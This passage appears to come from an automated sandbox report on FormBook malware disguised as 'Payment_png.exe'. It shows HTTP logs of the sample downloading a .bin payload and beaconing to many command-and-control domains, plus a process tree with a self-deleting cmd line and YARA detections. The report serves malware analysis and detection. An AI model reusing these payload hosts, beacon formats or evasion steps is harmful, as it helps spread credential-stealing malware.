                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 70 73 2d 6d 6d 2e 63 6f 6d 2f 62 69 6e 5f 42 4e 55 74 54 44 66 59 32 34 33 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.aps-mm.com/bin_BNUtTDfY243.bin">here</a>.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.349713170.249.199.10680C:\Users\user\Desktop\Payment_png.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 29, 2021 13:58:29.131409883 CEST292OUTGET /bin_BNUtTDfY243.bin HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                          Cache-Control: no-cache
                                                          Host: www.aps-mm.com
                                                          Connection: Keep-Alive
                                                          Mar 29, 2021 13:58:29.270570040 CEST292INHTTP/1.1 302 Found
                                                          Date: Mon, 29 Mar 2021 11:58:29 GMT
                                                          Server: Apache
                                                          Location: https://www.aps-mm.com/bin_BNUtTDfY243.bin
                                                          Content-Length: 226
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 70 73 2d 6d 6d 2e 63 6f 6d 2f 62 69 6e 5f 42 4e 55 74 54 44 66 59 32 34 33 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.aps-mm.com/bin_BNUtTDfY243.bin">here</a>.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.34973434.102.136.18080C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 29, 2021 13:59:15.924201012 CEST4022OUTGET /c8bs/?oX=mHnwrZz1sKQS3zf7QeEgVUMWoZ3Lc4fpOuayWuCDpyWMt82/PBRmHPawc0L3Kfl51U/x&sPj0qt=EzuD_nNPa4wlp HTTP/1.1
                                                          Host: www.plowbrothers.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 29, 2021 13:59:16.123061895 CEST4023INHTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Mon, 29 Mar 2021 11:59:16 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 275
                                                          ETag: "606189d6-113"
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.349735198.54.117.21880C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 29, 2021 13:59:26.801275015 CEST4879OUTGET /c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp HTTP/1.1
                                                          Host: www.loversdeal.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          4192.168.2.34973735.246.6.10980C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 29, 2021 13:59:37.759048939 CEST4882OUTGET /c8bs/?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c/5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp HTTP/1.1
                                                          Host: www.pcpartout.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 29, 2021 13:59:37.861877918 CEST4883INHTTP/1.1 301 Moved Permanently
                                                          Date: Mon, 29 Mar 2021 11:59:37 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          location: https://www.pcpartout.com/c8bs?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c%2F5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp
                                                          strict-transport-security: max-age=120
                                                          x-wix-request-id: 1617019177.80584040510711231
                                                          Age: 0
                                                          Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                          X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjiVMoGgJZPyIJpdYBUTBrV,qquldgcFrj2n046g4RNSVAWNqgzSMQ+UB9IQX4udZ+Q=,2d58ifebGbosy5xc+FRalvfZD7TLdGiEhML9WpD1EDCGLdCQN31ePkoJDRNIDPa3GgqFbFMYwiXnFojPwdof6CrAvUe7erS/8UkenfHSRWs=,2UNV7KOq4oGjA5+PKsX47FoxTR+xW4dT2i2c322L5wc=,LXlT8qjS5x6WBejJA3+gBYyEjTvzigG4XLss7FD8eEGTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,9bmvtgOsMBj+rhOGTJK8foYtDIPVQKjbBTecFiwGIGNvOTD8KsDugQppFc8+khY5muOkfcTSJaUOHlD2KQbqrA==
                                                          Cache-Control: no-cache
                                                          Server: Pepyaka/1.19.0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          5192.168.2.349738217.160.0.23380C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 29, 2021 13:59:42.981523991 CEST4884OUTGET /c8bs/?oX=LeA7SnvTFXlqZuqbSI7RL/JE3Y5e3FfIcVn/p/TMp/5vx2Fx/wjFaW5mPJS2e1LpHtn7&sPj0qt=EzuD_nNPa4wlp HTTP/1.1
                                                          Host: www.birkenhof-allgaeu.net
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 29, 2021 13:59:43.026885033 CEST4885INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Mon, 29 Mar 2021 11:59:43 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          6192.168.2.34974166.96.160.13380C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 29, 2021 13:59:48.360106945 CEST4921OUTGET /c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp HTTP/1.1
                                                          Host: www.choupisson.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 29, 2021 13:59:48.489104986 CEST4922INHTTP/1.1 302 Found
                                                          Date: Mon, 29 Mar 2021 11:59:48 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 313
                                                          Connection: close
                                                          Server: Apache/2
                                                          Location: https://www.choupisson.com/c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp
                                                          Cache-Control: max-age=3600
                                                          Expires: Mon, 29 Mar 2021 12:59:48 GMT
                                                          Accept-Ranges: bytes
                                                          Age: 0
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 68 6f 75 70 69 73 73 6f 6e 2e 63 6f 6d 2f 63 38 62 73 2f 3f 6f 58 3d 56 41 2b 52 68 65 55 68 6e 48 36 49 5a 62 6d 2b 55 38 59 32 6d 7a 43 6e 57 63 30 39 62 33 4a 48 69 47 46 56 36 6e 73 42 68 42 49 61 44 76 31 54 47 44 42 44 4f 47 68 49 54 75 65 41 66 46 66 76 2b 46 32 4f 26 61 6d 70 3b 73 50 6a 30 71 74 3d 45 7a 75 44 5f 6e 4e 50 61 34 77 6c 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.choupisson.com/c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&amp;sPj0qt=EzuD_nNPa4wlp">here</a>.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          7192.168.2.34974223.227.38.3280C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 29, 2021 13:59:53.620903015 CEST4923OUTGET /c8bs/?oX=O8PbLgx16hMIOJ1rZ9qRlhWRXDOrjvK9cMkfWsk/HAIbj7Mo3Z6p/LmWsoKge1OKT5Rd&sPj0qt=EzuD_nNPa4wlp HTTP/1.1
                                                          Host: www.uforservice.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 29, 2021 13:59:53.792627096 CEST4924INHTTP/1.1 403 Forbidden
                                                          Date: Mon, 29 Mar 2021 11:59:53 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          X-Sorting-Hat-PodId: 159
                                                          X-Sorting-Hat-ShopId: 46980300960
                                                          X-Dc: gcp-us-central1
                                                          X-Request-ID: 3034cefa-2765-4a18-84be-5fd56af09bd9
                                                          Set-Cookie: _shopify_fs=2021-03-29T11%3A59%3A53Z; Expires=Tue, 29-Mar-22 11:59:53 GMT; Domain=uforservice.com; Path=/; SameSite=Lax
                                                          X-Download-Options: noopen
                                                          X-Permitted-Cross-Domain-Policies: none
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          CF-Cache-Status: DYNAMIC
                                                          cf-request-id: 091f73e1350000c2bdc20e0000000001
                                                          Server: cloudflare
                                                          CF-RAY: 6378ef485d13c2bd-FRA
                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74
                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          8192.168.2.34974334.102.136.18080C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 29, 2021 14:00:09.173280001 CEST4931OUTGET /c8bs/?oX=9WVnx7W/2jtf/SBQb7qMRqW55HQP5AXdTxivKH+RIJcLuGeyWux88wPL6knHSRGt/sw8&sPj0qt=EzuD_nNPa4wlp HTTP/1.1
                                                          Host: www.silverdollarcafe.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 29, 2021 14:00:09.372026920 CEST4931INHTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Mon, 29 Mar 2021 12:00:09 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 275
                                                          ETag: "605e0bcb-113"
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                          HTTPS Packets

                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                          Mar 29, 2021 13:58:29.576385975 CEST170.249.199.106443192.168.2.349714CN=aps-mm.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 16 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Tue Jun 15 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                          CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                                                          CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                                                          Code Manipulations

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Start time:13:57:57
                                                          Start date:29/03/2021
                                                          Path:C:\Users\user\Desktop\Payment_png.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\Desktop\Payment_png.exe'
                                                          Imagebase:0x400000
                                                          File size:98304 bytes
                                                          MD5 hash:86FA26E33879D3C04152301EAAABA518
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Visual Basic
                                                          Reputation:low

                                                          General

                                                          Start time:13:58:18
                                                          Start date:29/03/2021
                                                          Path:C:\Users\user\Desktop\Payment_png.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\Desktop\Payment_png.exe'
                                                          Imagebase:0x400000
                                                          File size:98304 bytes
                                                          MD5 hash:86FA26E33879D3C04152301EAAABA518
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:low

                                                          General

                                                          Start time:13:58:32
                                                          Start date:29/03/2021
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:
                                                          Imagebase:0x7ff714890000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:13:58:43
                                                          Start date:29/03/2021
                                                          Path:C:\Windows\SysWOW64\colorcpl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                          Imagebase:0xe70000
                                                          File size:86528 bytes
                                                          MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000E.00000002.472974211.0000000005117000.00000004.00000001.sdmp, Author: Florian Roth
                                                          • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000E.00000002.470737147.0000000003032000.00000004.00000020.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:moderate

                                                          General

                                                          Start time:13:58:50
                                                          Start date:29/03/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:/c del 'C:\Users\user\Desktop\Payment_png.exe'
                                                          Imagebase:0xf20000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:13:58:50
                                                          Start date:29/03/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6b2800000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >